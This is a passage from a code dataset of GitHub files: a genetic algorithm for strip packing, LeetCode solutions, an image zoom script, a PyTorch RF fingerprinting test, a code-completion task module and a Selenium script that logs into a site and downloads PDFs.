1)\r\n        # Pick two parents at random\r\n        padre1 = poblacion[indice_padre1]\r\n        padre2 = poblacion[indice_padre2]\r\n        # Choose the parent with the lower fitness value\r\n        if self._fitness(padre1) <= self._fitness(padre2):\r\n            return padre1\r\n        else:\r\n            return padre2\r\n\r\n    # PMX crossover operator\r\n    def _pmx(self, padre1, padre2, n):\r\n        hijo = np.zeros(n)\r\n        punto1 = np.random.randint(1, n - 1)\r\n        punto2 = np.random.randint(1, n - 1)\r\n        while (punto1 == punto2):\r\n            punto2 = np.random.randint(1, n - 1)\r\n        # Swap the cut points if they are crossed\r\n        if punto1 > punto2:\r\n            aux = punto2\r\n            punto2 = punto1\r\n            punto1 = aux\r\n        # Distribute the segments\r\n        hijo[:punto1] = padre1[:punto1]\r\n        hijo[punto1:punto2] = padre2[punto1:punto2]\r\n        hijo[punto2:] = padre1[punto2:]\r\n        
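# PMX repair: each padre1 gene displaced by the copied middle segment is relocated by chasing the position mapping until a slot outside the cut points is found\r\n        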
# Find the values that were not copied over\r\n        for i in range(punto1, punto2):\r\n            if not (padre1[i] in padre2[punto1:punto2]):\r\n                index = self._indice(padre1, padre2[i])\r\n                while punto1 <= index < punto2:\r\n                    index = self._indice(padre1, hijo[index])\r\n                hijo[index] = padre1[i]\r\n        return hijo\r\n\r\n    # Mutation by swapping two random genes\r\n    def _mutacion(self, individuo):\r\n        index1 = np.random.randint(0, self.n)\r\n        index2 = np.random.randint(0, self.n)\r\n        while index1 == index2:\r\n            index2 = np.random.randint(0, self.n)\r\n        aux = individuo[index1]\r\n        individuo[index1] = individuo[index2]\r\n        individuo[index2] = aux\r\n\r\n        return individuo\r\n\r\n    # Return the best individual in the population\r\n    def _mejor_individuo(self, poblacion):\r\n        resultado = poblacion[0]\r\n        valor = self._fitness(poblacion[0])\r\n\r\n        for i in range(1, self.Np):\r\n            nuevo_valor = self._fitness(poblacion[i])\r\n            if nuevo_valor < valor:\r\n                valor = nuevo_valor\r\n                resultado = poblacion[i]\r\n\r\n        return np.copy(resultado)\r\n\r\n    # Given an individual and a value, return the position where the value occurs\r\n    def _indice(self, individuo, valor):\r\n        for i in range(len(individuo)):\r\n            if individuo[i] == valor:\r\n                return i\r\n\r\n    # Main algorithm\r\n    def run(self):\r\n        n = self.n\r\n        gen = self.gens\r\n\r\n        poblacion = self._generar_poblacion(n)\r\n        nueva_poblacion = np.zeros((self.Np, n))\r\n        resultado = self._mejor_individuo(poblacion)\r\n\r\n        if self.show_figure:\r\n            print(\"Rectangle widths: \", end='')\r\n            print(self.anchos)\r\n            print(\"Rectangle heights: \", end='')\r\n            print(self.alturas)\r\n            print(\"-----------------------------------------\")\r\n            print(\"First best result: \", end='')\r\n            print(resultado)\r\n\r\n        # Plot Individual\r\n        if self.show_figure:\r\n            Plotter.PlotterStrip().plot_individual_with_no_rotation(individual=resultado, max_width=self.W,\r\n                                                                    heights=self.alturas, widths=self.anchos,\r\n                                                                    title=\"Strip Packaging Problem - No Rotations \\n\"\r\n                                                                          \"Best solution - Start\")\r\n        if self.show_figure:\r\n            print(\"The total height is: \", end='')\r\n            print(self._fitness(resultado))\r\n            print(\"-----------------------------------------\")\r\n\r\n        for i in range(gen):\r\n            for j in range(self.Np):\r\n                # Apply crossover\r\n                if np.random.random() <= self.Pc:\r\n                    padre1 = self._seleccionar_padre(poblacion)\r\n                    padre2 = self._seleccionar_padre(poblacion)\r\n                    hijo = self._pmx(padre1, padre2, n)\r\n                else:\r\n                    hijo = poblacion[j]\r\n\r\n                # Apply mutation\r\n                if np.random.random() <= self.Pm:\r\n                    hijo = self._mutacion(hijo)\r\n                # Add to the new population\r\n                nueva_poblacion[j] = hijo\r\n\r\n            poblacion = np.copy(nueva_poblacion)\r\n            mejor_actual = self._mejor_individuo(poblacion)\r\n            if self._fitness(mejor_actual) < self._fitness(resultado):\r\n                resultado = np.copy(mejor_actual)\r\n\r\n        if self.show_figure:\r\n            print(\"The rectangle order is: \", end='')\r\n            print(resultado)\r\n\r\n        # Plot Individual\r\n        if self.show_figure:\r\n            Plotter.PlotterStrip().plot_individual_with_no_rotation(individual=resultado, max_width=self.W,\r\n                                                                    heights=self.alturas, widths=self.anchos,\r\n                                                                    title = \"Strip Packaging Problem - No Rotations \\n\"\r\n                                                                            \"Best solution - Final\")\r\n        if self.show_figure:\r\n            print(\"The total height is: \", end='')\r\n            print(self._fitness(resultado))\r\n\r\n        # Return best individual and best value\r\n        return resultado, self._fitness(resultado)\r\n","repo_name":"meganmaguire/SPP-GA","sub_path":"AGnr.py","file_name":"AGnr.py","file_ext":"py","file_size_in_byte":7369,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"12191570967","text":"import numpy as np\nimport cv2\n\nimg = cv2.imread(\"lisa.jpeg\")\nw = img.shape[0]\nh = img.shape[1]\n\nzoom = np.zeros((w,h,3), np.uint8)\nwz = zoom.shape[0]\nhz = zoom.shape[1]\n\nprint(\"original\",w,h)\nprint(\"zoomed\",wz,hz)\n\nfor i in range(wz):\n for j in range(hz):\n for k in range(3):\n zoom[i][j][k] = img[round(i/3)+80][round(j/3)+300][k]\n\ncv2.imshow('MY Image',zoom)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\ncv2.imwrite(\"lisa_result_1.jpg\",zoom)\n\n","repo_name":"jayin92/NYCU-cv-and-uav","sub_path":"lab01/interpolation1.py","file_name":"interpolation1.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"17195955507","text":"n, s = map(int, input().split())\n\nnumbers = list(map(int, input().split()))\n\nstart = 0\nend = 0\n\nresult = int(1e9)\ntmp = numbers[end]\nwhile True:\n if tmp >= s:\n result = min(result, end-start+1)\n if start == end:\n break\n tmp = tmp - numbers[start]\n start = start + 1\n else:\n end = end + 1\n if end == n:\n break\n tmp = tmp + numbers[end]\n \n \nif result == int(1e9):\n print(0)\nelse:\n print(result)","repo_name":"JungWooGeon/BAEKJOON","sub_path":"1806.py","file_name":"1806.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17214043004","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def deleteDuplicates(self, head):\n \"\"\"\n simple question, runs in 44ms beats 100%\n \"\"\"\n if not head:\n return head\n cur = head\n while cur.next:\n if cur.next.val == cur.val:\n cur.next = cur.next.next\n else:\n cur = cur.next\n return head","repo_name":"yunkaiwang/LeetCodeSol","sub_path":"algorithms/83_RemoveDuplicatesFromSortedList.py","file_name":"83_RemoveDuplicatesFromSortedList.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21450507865","text":"class SnapshotArray(object):\n\n def __init__(self, length):\n \"\"\"\n Runtime: 588 ms, faster than 32.91% of Python online submissions for Snapshot Array.\n Memory Usage: 51.1 MB, less than 100.00% of Python online submissions for Snapshot Array.\n S:O(n)\n :type length: int\n \"\"\"\n self.history = [[[0,0]] for _ in range(length)] #[ver, value]\n self.ver = 0\n\n def set(self, index, val):\n \"\"\"\n T:O(1)\n :type index: int\n :type val: int\n :rtype: None\n \"\"\"\n last = self.history[index][-1] # last = [ver, value]\n if last[0] == self.ver:\n last[1] = val\n else:\n self.history[index].append([self.ver, val])\n\n def snap(self):\n \"\"\"\n T:O(1)\n :rtype: int\n \"\"\"\n self.ver += 1\n return self.ver-1\n\n\n def get(self, index, snap_id):\n \"\"\"\n T:(log(n))\n :type index: int\n :type snap_id: int\n :rtype: int\n \"\"\"\n if snap_id > self.ver:\n return None\n return self.bs(self.history[index], snap_id)\n\n\n def bs(self, lst, snap_id):\n l, r = 0, len(lst)\n while l < r:\n mid = (l+r-1)/2\n if lst[mid][0] > snap_id:\n r = mid\n else:\n l = mid+1\n return lst[l-1][1]\n\n\n\n\n# Your SnapshotArray object will be instantiated and called as such:\n# obj = SnapshotArray(length)\n# obj.set(index,val)\n# param_2 = obj.snap()\n# param_3 = 
obj.get(index,snap_id)","repo_name":"jerrt2003/leetcode-in-python","sub_path":"1146_Snapshot_Array/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"16001920888","text":"from __future__ import print_function\n\nimport torch.nn as nn\nimport torch.nn.init\n\nfrom torch.utils.data import Dataset, DataLoader\ntorch.set_printoptions(precision=10)\n\nimport timeit\nimport numpy as np\nimport torch\n\nfrom Utils_JSK_workshop import Extraction_Features, awgn, CNN_workshop_SS, CNN_workshop\n\nif torch.cuda.is_available():\n    device = 'cuda'\nelse:\n    device = 'cpu'  # fixed: this branch was a bare string expression, leaving device undefined on CPU-only machines\nif device == 'cuda':\n    torch.cuda.manual_seed(7777)\nelse:\n    torch.manual_seed(7777)\n\n#############################################################################################################\n## [Start] Phase 2. Classifier test stage\n## Purpose: stage that evaluates the RF fingerprinting model trained on the constructed dataset\n#############################################################################################################\n\n##\n## Dataset loader\n##\n\n##\n## Reference Database number : 0\n##\nDB_num = 0\nprint('The ' + str(DB_num) + 'th database is loaded')\ntest_DB_raw = np.load('./Models/DB/[' + str(DB_num) + '][8C]Test_DB_raw.npy')\ntest_label_DB = np.load('./Models/DB/[' + str(DB_num) + '][8C]Test_label_DB.npy')\n\n##\n## Dataloader class definition for model testing\n##\n\nclass RF_test(Dataset):\n    def __init__(self):\n        self.len = test_DB_raw.shape[0]\n        self.x_data_real = torch.from_numpy(np.real(test_DB_raw)).float()\n        self.x_data_image = torch.from_numpy(np.imag(test_DB_raw)).float()\n\n        self.y_data = torch.from_numpy(test_label_DB).long()\n\n    def __getitem__(self, index):\n        return self.x_data_real[index], self.x_data_image[index], self.y_data[index]\n\n    def __len__(self):\n        return self.len\n\n##\n## Start of testing; for simplicity the averaging loop runs only once\n##\nAvg_times = 1\n\nfor zzz in range(Avg_times):\n    zzz = zzz + 1\n\n    print('The ' + str(zzz) + 'th avg_times are ongoing')\n\n    #######################################################\n    ## [Start] Phase 2-1. Model Testing\n    ## Purpose: evaluate the performance of the model trained earlier.\n    #######################################################\n\n    Extractors = Extraction_Features()\n\n    ##\n    ## Target SNR definition (AWGN)\n    ## SNR < 1000 -> NO AWGN noise case\n    ## SNR := [1000(No SNR), ... 
(Target SNR)]\n    ##\n\n    # SNR_range = list(range(20, 20 + 1, 5))\n    SNR_range = []\n    SNR_range.insert(0,1000)\n\n    SNR_result = np.zeros((6, len(SNR_range)))\n\n    for k in range(len(SNR_range)):\n        check_point = 0\n\n        SNR = SNR_range[k]\n        # print(SNR)\n\n\n        # ##\n        # ## Classifier model definition.\n        # ## For version 1, Define your own classifier models\n        # ## Loads the model trained and saved in Phase 1-1.\n        # ##\n\n        model_version = 'CNN'\n        new_model = CNN_workshop().to(device)\n        # new_model = CNN_workshop_SS().to(device)\n\n        ##\n        ## Classifier model definition.\n        ## For version 1, including Ethernet connection and googlenet structure\n        ## Loads the model trained and saved in Phase 1-1.\n\n        ##\n        ## URL : https://pytorch.org/hub/pytorch_vision_googlenet/\n        ##\n\n        # model_version = 'GoogLeNet'\n        # new_model = torch.hub.load('pytorch/vision:v0.6.0', 'googlenet', pretrained=True).to(device)\n        # new_model.transform_input = False\n        #\n        # num_out_chs = new_model.conv1.conv.out_channels\n        # new_model.conv1.conv = nn.Conv2d(1, num_out_chs, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)\n        #\n        # num_ftrs = new_model.fc.in_features\n        # new_model.fc = nn.Linear(num_ftrs,8,bias=True)\n        #\n        # new_model = new_model.to(device)\n\n\n        ##\n        ## Load the model structure and parameters saved during training\n        ##\n\n        new_model.load_state_dict(torch.load(\"./Models/RF_fingerprinting/[\" + str(zzz) + \"][\" + model_version + \"]Classifier_\" + str(SNR) + \".pth\"))\n\n        print(\"[Avg : {:>3}] [SNR : {:>3}] Load the model from *.pth files\".format(zzz, SNR))\n\n        ##\n        ## Dataset loader, following the PyTorch Dataset definition\n        ##\n        dataset_test = RF_test()\n        test_loader = DataLoader(dataset=dataset_test, batch_size=1, shuffle=True, num_workers=0)\n\n        with torch.no_grad():\n            new_model.eval()\n\n            avg_acc = 0\n            avg_test_time = 0\n            avg_Feature_time = 0\n            avg_STFT_time = 0\n\n            total_batch_test = len(test_loader)\n\n            Num_class = 8\n            Conf_mat = np.zeros((Num_class,Num_class))\n\n            for i, data in enumerate(test_loader):\n\n                inputs_raw_real, imputs_raw_image, labels = data\n\n                if SNR < 1000:\n                    inputs_raw_real, imputs_raw_image = awgn(inputs_raw_real.numpy(), imputs_raw_image.numpy(), SNR)\n                    inputs_sig_test = inputs_raw_real + 1j * imputs_raw_image\n                else:\n                    inputs_sig_test = inputs_raw_real.numpy() + 1j * imputs_raw_image.numpy()\n\n                _ , features_spectrum, features_time, features_spectrum_time = Extractors.RTextraction(inputs_sig_test)\n\n                # _ , features_spectrum, features_time, features_spectrum_time = Extractors.SSextraction(inputs_sig_test)\n\n                tmp = np.reshape(features_spectrum,\n                                 (\n                                     features_spectrum.shape[0], 1, features_spectrum.shape[1], features_spectrum.shape[2]))\n                features_spectrum = torch.from_numpy(tmp).float()\n\n                inputs = features_spectrum.to(device)\n\n                labels = labels.to(device)\n\n                ##\n                ## Feed the test data (tensor form) into the model.\n                ##\n                testing_st = timeit.default_timer()\n                prediction_Ts = new_model(inputs)\n\n                testing_fi = timeit.default_timer()\n                test_time = -1*(testing_st-testing_fi)\n\n                ##\n                ## Compare the model output against the labels\n                ##\n                correct_prediction_Ts = torch.argmax(prediction_Ts, 1) == labels\n                accuracy_Ts = correct_prediction_Ts.float().mean()\n\n                ##\n                ## Sample test: inspect the top-3 prediction results.\n                ##\n                ex_acc, ex_label = torch.sort(torch.softmax(prediction_Ts, 1)[0, :], descending=True)\n\n                print(' ')\n                print('Prediction Test examples [Top-3 predictions]')\n                print('The model predicts the test inputs as : ')\n                print('1st predictions : [Device ID : {:>=3}] with confidence score [{:>=3}]'.format(ex_label[0] + 1, ex_acc[0]))\n                print('2nd 
predictions : [Device ID : {:>=3}] with confidence score [{:>=3}]'.format(ex_label[1] + 1, ex_acc[1]))\n print('3rd predictions : [Device ID : {:>=3}] with confidence score [{:>=3}]'.format(ex_label[2] + 1, ex_acc[2]))\n print(' ')\n\n avg_test_time += test_time\n avg_acc += accuracy_Ts\n avg_Feature_time += features_time\n avg_STFT_time += features_spectrum_time\n\n for jj in range(len(labels)):\n Act_val = labels[jj]\n Pre_val = torch.argmax(prediction_Ts, 1).cpu().numpy()[jj]\n Conf_mat[Act_val,Pre_val] += 1\n\n np.savetxt(\"./Models/RF_fingerprinting/[\" + str(zzz) + \"][\" + model_version + \"]Classifier_\" + str(SNR) + \"_conf_mat.csv\", Conf_mat, delimiter=\",\")\n\n print(\"[Avg : {:>3}] Test for [SNR : {:>3}] is finished\".format(zzz, SNR))\n\n avg_acc = avg_acc / total_batch_test\n avg_test_time = avg_test_time / total_batch_test\n avg_Feature_time = avg_Feature_time / dataset_test.len\n avg_STFT_time = avg_STFT_time / dataset_test.len\n\n # print('Accuracy_Ts:', avg_acc.item())\n tmp_val = avg_acc.item()\n print('[Avg : {:>=3}] [SNR : {:>=3}] Accuracy_Ts: {:>=4}'.format(zzz, SNR, tmp_val))\n print('[Avg : {:>=3}] [SNR : {:>=3}] Avg_Feature_time: {:>=4}'.format(zzz, SNR, avg_Feature_time))\n print('[Avg : {:>=3}] [SNR : {:>=3}] Avg_STFT_time: {:>=4}'.format(zzz, SNR, avg_STFT_time))\n print('[Avg : {:>=3}] [SNR : {:>=3}] Avg_test_time : {:>=4}'.format(zzz, SNR, avg_test_time))\n print('[Avg : {:>=3}] Testing_finished'.format(zzz))\n\n SNR_result[0, k] = SNR\n SNR_result[1, k] = avg_acc\n SNR_result[2, k] = avg_Feature_time\n SNR_result[3, k] = avg_STFT_time\n SNR_result[4, k] = avg_test_time\n\n np.savetxt('./Models/RF_fingerprinting/[' + str(zzz) + '][' + model_version + ']Testing_result.csv', SNR_result)\n\n #######################################################\n ## [종료] Phase 2-1. 
(Offline) Testing procedure finished\n #######################################################\n\n\n\n","repo_name":"Jusungkang/INFONET_workshop","sub_path":"[INFONET]RF_Fingerprinting_testing_v1.py","file_name":"[INFONET]RF_Fingerprinting_testing_v1.py","file_ext":"py","file_size_in_byte":9096,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40398792499","text":"import os\nimport re\n\nimport numpy as np\nimport torch\n\nfrom ncc import LOGGER\nfrom ncc.data import constants\nfrom ncc.data import indexed_dataset\nfrom ncc.data.completion.completion_dataset import CompletionDataset\nfrom ncc.data.completion.completion_dictionary import CompletionDictionary as Dictionary\nfrom ncc.data.wrappers.truncate_dataset import TruncateDataset\nfrom ncc.tasks import register_task\nfrom ncc.tasks.ncc_task import NccTask\nfrom ncc.data.wrappers.concat_dataset import ConcatDataset\nfrom ncc.utils import utils\nfrom ncc.utils.logging import metrics\nfrom .completion import CompletionTask\n\n\ndef _load_dataset(path, impl, dict=None):\n if impl == 'raw':\n raise NotImplementedError(impl)\n elif impl == 'mmap':\n # mmap dataset has been numberized, no need for dict\n src_dataset = indexed_dataset.MMapIndexedDataset(path=path)\n else:\n raise NotImplementedError(\"No such {} dataset implementation.\".format(impl))\n return src_dataset\n\n\ndef load_token_dataset(\n data_paths, split, tgt, tgt_dict, dataset_impl,\n attrs=None, attr_dict=None,\n attrs_mapping=None, reversed_attrs_mapping=None,\n truncate_target=False, max_target_positions=None,\n):\n # load tokens\n tgt_dataset = []\n for data_path in data_paths:\n tgt_path = os.path.join(data_path, '{}.{}'.format(split, tgt))\n tgt_dataset.append(_load_dataset(tgt_path, dataset_impl))\n tgt_dataset = ConcatDataset(tgt_dataset)\n if truncate_target:\n tgt_dataset = TruncateDataset(tgt_dataset, max_target_positions)\n LOGGER.info('Truncate dataset into max length: {}'.format(max_target_positions))\n LOGGER.info('loaded {} examples from: {}'.format(len(tgt_dataset), data_paths))\n # load tokens.ext\n tgt_ext_paths = [os.path.join(data_path, '{}.{}.ext'.format(split, tgt)) for data_path in data_paths]\n if all(indexed_dataset.SeqIndexedDataset.exists(tgt_ext_path) for tgt_ext_path in tgt_ext_paths):\n tgt_ext_dataset = indexed_dataset.SeqIndexedDataset(tgt_ext_paths[0])\n for tgt_ext_path in tgt_ext_paths[1:]:\n tgt_ext_dataset.append(indexed_dataset.SeqIndexedDataset(tgt_ext_path))\n if truncate_target:\n tgt_ext_dataset.clip(max_position=max_target_positions)\n assert len(tgt_dataset) == len(tgt_ext_dataset), (len(tgt_dataset), len(tgt_ext_dataset))\n else:\n tgt_ext_dataset = None\n # load attrs\n if attrs is None:\n attr_dataset = None\n else:\n attr_dataset = []\n for data_path in data_paths:\n attr_path = os.path.join(data_path, '{}.code_types'.format(split))\n attr_dataset.append(_load_dataset(attr_path, dataset_impl))\n attr_dataset = ConcatDataset(attr_dataset)\n if truncate_target:\n tgt_dataset = TruncateDataset(tgt_dataset, max_target_positions)\n LOGGER.info('Truncate dataset\\'s attributes into max length: {}'.format(max_target_positions))\n LOGGER.info('loaded {} examples from: {}'.format(len(attr_dataset), data_path))\n # load attr.ext\n attr_ext_paths = [os.path.join(data_path, '{}.code_types.ext'.format(split)) for data_path in data_paths]\n if all(indexed_dataset.SeqIndexedDataset.exists(attr_ext_path) for attr_ext_path in attr_ext_paths):\n attr_ext_dataset = 
indexed_dataset.SeqIndexedDataset(attr_ext_paths[0])\n for attr_ext_path in attr_ext_paths[1:]:\n attr_ext_dataset.append(indexed_dataset.SeqIndexedDataset(attr_ext_path))\n if truncate_target:\n attr_ext_dataset.clip(max_position=max_target_positions)\n assert np.all(tgt_ext_dataset == attr_ext_dataset)\n del attr_ext_dataset\n\n return CompletionDataset(\n tgt_dataset, tgt_dataset.sizes, tgt_dict, extends=tgt_ext_dataset,\n attrs=attrs, attr_indices=attr_dataset, attr_dict=attr_dict,\n attrs_mapping=attrs_mapping, reversed_attrs_mapping=reversed_attrs_mapping,\n max_target_positions=max_target_positions,\n )\n\n\n@register_task('multi_task_completion')\nclass MultiTaskCompletionTask(CompletionTask):\n \"\"\"Task for training masked language models (e.g., BERT, RoBERTa).\"\"\"\n\n def __init__(self, args, dictionary, token_dictionary=None):\n super().__init__(args, dictionary, token_dictionary)\n\n @classmethod\n def setup_task(cls, args, **kwargs):\n \"\"\"Setup the task (e.g., load dictionaries).\n\n Args:\n args (argparse.Namespace): parsed command-line arguments\n \"\"\"\n\n paths = utils.split_paths(args['task']['data'])\n assert len(paths) > 0\n # load dictionaries\n dict_file = os.path.join(paths[0], '{}.dict.jsonl'.format(args['task']['target_lang']))\n dictionary = cls.load_dictionary(dict_file)\n LOGGER.info('[{}] dictionary: {} types'.format(args['task']['target_lang'], len(dictionary)))\n token_file = os.path.join(paths[0], 'code_types.dict.jsonl')\n if os.path.exists(token_file):\n token_dictionary = cls.load_dictionary(token_file)\n LOGGER.info('[code_tokens] dictionary: {} types'.format(len(token_dictionary)))\n else:\n token_dictionary = None\n return cls(args, dictionary, token_dictionary)\n\n def load_dataset(self, split, epoch=1, combine=False, **kwargs):\n \"\"\"Load a given dataset split.\n\n Args:\n split (str): name of the split (e.g., train, valid, test)\n \"\"\"\n paths = utils.split_paths(self.args['task']['data'])\n assert len(paths) > 0\n data_path = paths[(epoch - 1) % len(paths)]\n\n if self.args['task']['target_lang'] == 'code_tokens' and self.args['task'].get('code_types', False):\n attrs_mapping = {\n 'attr': {self.token_dictionary.index('attr')},\n 'num': {self.token_dictionary.index('Num')},\n 'name': {self.token_dictionary.index('NameStore'),\n self.token_dictionary.index('NameLoad')},\n 'param': {self.token_dictionary.index('arg'),\n self.token_dictionary.index('kwarg'),\n self.token_dictionary.index('vararg')},\n }\n elif self.args['task']['target_lang'] == 'ast' and self.args['task'].get('code_types', False):\n attrs_mapping = {\n 'attr': {self.token_dictionary.index('attr')},\n 'num': {self.token_dictionary.index('Num')},\n 'name': {self.token_dictionary.index('NameStore'),\n self.token_dictionary.index('NameLoad')},\n 'param': {self.token_dictionary.index('NameParam')},\n }\n else:\n attrs_mapping = None\n\n if attrs_mapping:\n reversed_attrs_mapping = {}\n for k, vs in attrs_mapping.items():\n if len(vs) > 1:\n for v in vs:\n reversed_attrs_mapping[v] = k\n else:\n reversed_attrs_mapping[list(vs)[0]] = k\n else:\n reversed_attrs_mapping = None\n\n data_paths = [os.path.join(data_path, task_name) for task_name in self.args['task']['task_pipeline']]\n\n self.datasets[split] = load_token_dataset(\n data_paths, split, self.args['task']['target_lang'], self.target_dictionary,\n attrs_mapping=attrs_mapping, reversed_attrs_mapping=reversed_attrs_mapping,\n attrs=self.args['task'].get('code_types', None),\n attr_dict=self.token_dictionary,\n 
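# note: dataset_impl is effectively 'mmap' here -- _load_dataset at the top of\n            # this module raises NotImplementedError for the 'raw' implementation\n            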
dataset_impl=self.args['dataset']['dataset_impl'],\n truncate_target=self.args['dataset'].get('truncate_target', False),\n max_target_positions=self.max_positions()\n )\n","repo_name":"CGCL-codes/naturalcc","sub_path":"ncc/tasks/completion/multitask_completion.py","file_name":"multitask_completion.py","file_ext":"py","file_size_in_byte":7764,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"53"} +{"seq_id":"38023299230","text":"from typing import List\n\n\nclass Solution:\n def productExceptSelf(self, nums: List[int]) -> List[int]:\n results = [1] * len(nums)\n suffix_product = 1\n for i in range(1, len(nums)):\n results[i] = nums[i - 1] * results[i - 1]\n for i in range(len(nums) - 1, -1, -1):\n results[i] *= suffix_product\n suffix_product *= nums[i]\n return results\n","repo_name":"Penguin-jpg/LeetCode","sub_path":"Top_Interview_Questions/Medium/238. Product of Array Except Self/solution3.py","file_name":"solution3.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9999640608","text":"\"\"\"\n给定一个数组 prices ,它的第 i 个元素 prices[i] 表示一支给定股票第 i 天的价格。\n你只能选择 某一天 买入这只股票,并选择在 未来的某一个不同的日子 卖出该股票。设计一个算法来计算你所能获取的最大利润。\n返回你可以从这笔交易中获取的最大利润。如果你不能获取任何利润,返回 0 。\n\"\"\"\nfrom typing import List\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n ret = start = 0\n for i in range(1, len(prices)):\n # 当最小价格小于start指针切换至当前\n if prices[i] - prices[start] < 0:\n start = i\n # 每次比较最优抛售价格\n ret = max(prices[i] - prices[start], ret)\n return ret\n\nresult=Solution()\nprint(result.maxProfit([1,2]))","repo_name":"kongkongo/LeetCode","sub_path":"maxProfit.py","file_name":"maxProfit.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71710287527","text":"import os\nimport shutil\nimport time\nfrom ast import Assert\nfrom lib2to3.pgen2 import driver\nfrom multiprocessing.connection import wait\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nfrom UploadpdfToGoogleDrive import UploadPdftoGdrive\n\n\nclass Downloadpdffromwebsite:\n def __init__(self):\n self.chrome_path = \"C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\Rar$EX00.687\\\\chromedriver\"#set your own webdriver.exe file path\n #options setup:\n self.chrome_options = webdriver.ChromeOptions()\n self.chrome_options.add_argument(\"--disable-popup-blocking\")\n self.chrome_options.add_argument(\"--disable-notifications\")\n self.chrome_options.add_argument(\"start-maximized\");\n self.chrome_options.add_argument(\"disable-infobars\")\n self.chrome_options.add_argument(\"--disable-extensions\")\n prefs = {\"download.default_directory\" : \"C:\\\\Users\\\\user\\\\Desktop\\\\iman\\\\DataImbalanced\\\\NoorsBooksScraping\\\\Download\"}\n self.chrome_options.add_experimental_option(\"prefs\",prefs)\n #initialize webdriver state\n self.driver = webdriver.Chrome(self.chrome_path,chrome_options=self.chrome_options)\n\n\n # method to get the downloaded file name\n def get_and_rename_downLoaded_file_name(self,new_name_file,download_path,waitTime=20):\n \n file_not_exist=True\n # function to wait for all chrome downloads to finish\n def 
chrome_downloads(drv):\n \n if not \"chrome://downloads\" in drv.current_url: # if 'chrome downloads' is not current tab\n drv.execute_script(\"window.open('');\") # open a new tab\n drv.switch_to.window(self.driver.window_handles[1]) # switch to the new tab\n drv.get(\"chrome://downloads/\") # navigate to chrome downloads\n return drv.execute_script(\"\"\"\n return document.querySelector('downloads-manager')\n .shadowRoot.querySelector('#downloadsList')\n .items.filter(e => e.state === 'COMPLETE')\n .map(e => e.filePath || e.file_path || e.fileUrl || e.file_url);\n \"\"\")\n # wait for all the downloads to be completed\n while file_not_exist==True:\n dld_file_paths = WebDriverWait(self.driver, 120, 1).until(chrome_downloads) # returns list of downloaded file paths\n # Close the current tab (chrome downloads)\n if \"chrome://downloads\" in self.driver.current_url:\n self.driver.close()\n # Switch back to original tab\n self.driver.switch_to.window(self.driver.window_handles[0]) \n # get latest downloaded file name and path\n dlFilename = dld_file_paths[0] # latest downloaded file from the list\n # wait till downloaded file appears in download directory\n time_to_wait = waitTime # adjust timeout as per your needs\n time_counter = 0\n while not os.path.isfile(dlFilename):\n time.sleep(1)\n time_counter += 1\n if time_counter > time_to_wait:\n break\n # rename the downloaded file\n try:\n os.rename(os.path.join(download_path, dlFilename), os.path.join(download_path, new_name_file))\n file_not_exist=False\n break\n except:\n pass\n return\n\n #function to login to the website account\n def login_to_website(self,login_url='https://www.website.com/login',user_name='username@gmail.com',pass_word='*****'):#set your own acount credintials\n #login to website account manually:\n self.driver.get(login_url)\n try:\n WebDriverWait(self.driver, 60).until(\n EC.element_located_selection_state_to_be((By.CLASS_NAME, \"submit-login\"),is_selected=True))\n except: \n print('you are not logged in please try again later.')\n #login to website account auatomatically:\n\n #user_name_box=self.driver.find_element(By.NAME,\"email\"\n #user_name_box.clear()\n #user_name_box.send_keys(user_name)\n \n #pass_word_box=self.driver.find_element(By.NAME,'password')\n #pass_word_box.clear()\n #pass_word_box.send_keys(pass_word)\n\n #login_btn=self.driver.find_element(By.CLASS_NAME,'submit-login')\n #login_btn.click()\n\n def all_pdf_download(self,base_url,download_path,file_name,file_path):\n \n self.driver.minimize_window()\n self.driver.get(base_url)\n #remove adds from website page.\n all_iframes = self.driver.find_elements(By.CLASS_NAME,\"adsbygoogle\")\n print(len(all_iframes))\n if len(all_iframes) > 0:\n print(\"Ad Found\\n\")\n self.driver.execute_script(\"\"\"\n var elems = document.getElementsByClassName(\"adsbygoogle\"); \n for(var i = 0, max = elems.length; i < max; i++)\n {\n elems[i].hidden=true;\n elems[i].remove=true;\n\n }\n \"\"\")\n #click download button\n button = self.driver.find_element(By.CLASS_NAME,\"download_button\")#set the class name up on your website page source info\n button.click()\n self.driver.maximize_window()\n try:\n button = WebDriverWait(self.driver, 300).until(\n EC.element_to_be_clickable((By.CLASS_NAME, \"internal_download_link\")))#set the class name up on your website page source info\n\n button.click()\n except:\n\n print(\"{base_url} Not downloaded\")\n return {base_url : 0}\n \n #it is important to wait for the download process to be stablished successfully\n time.sleep(5)\n 
